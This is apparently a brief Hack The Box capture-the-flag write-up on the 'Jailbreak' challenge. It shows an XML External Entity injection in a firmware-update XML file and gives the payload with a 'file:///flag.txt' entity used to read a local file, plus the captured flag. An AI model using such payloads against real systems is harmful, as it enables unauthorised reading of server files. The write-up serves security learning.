Solving Jailbreak of HTB CTF

Problem - The crew secures an experimental Pip-Boy from a black market merchant, recognizing its potential to unlock the heavily guarded bunker of Vault 79. Back at their hideout, the hackers and engineers collaborate to jailbreak the device, working meticulously to bypass its sophisticated biometric locks. Using custom firmware and a series of precise modifications, can you bring the device to full operational status in order to pair it with the vault door's access port. The flag is located in /flag.txt

Our primary hints - ‘/flag.txt’ and ‘firmware’

So there is a tab in the spawned docker named ‘ROM’. In there is our target - XML FILE

A part of it looks something like this -

<Firmware>

<Version>1.33.7</Version>

<ReleaseDate>2077-10-21</ReleaseDate>

<Description>Update includes advanced biometric lock functionality for enhanced security.</Description>

</Firmware>

The vulnerability here I identified at first was whatever is written in the Version tag is reflected in a line below.

The trick is to dynamically render the Version in the XML.

Let me tell you what I mean:

<!DOCTYPE FirmwareUpdateConfig [

<!ENTITY example “Hello World”>

]>

<Version>&example;<?Version>

It will reflect the ‘Hello World’ instead of 1.33.7 now.

This is our backdoor. In simple words - Pass the file name ‘flag.txt’ inside the Version. Like this:

<!DOCTYPE FirmwareUpdateConfig [

<!ENTITY myfile SYSTEM “file:///flag.txt”>

]>

<Version>&myfile;<?Version>

There you cracked it -

HTB{b1om3tric_l0cks_4nd_fl1cker1ng_l1ghts_b103d476e8c275bf4a21c7def89a2c69}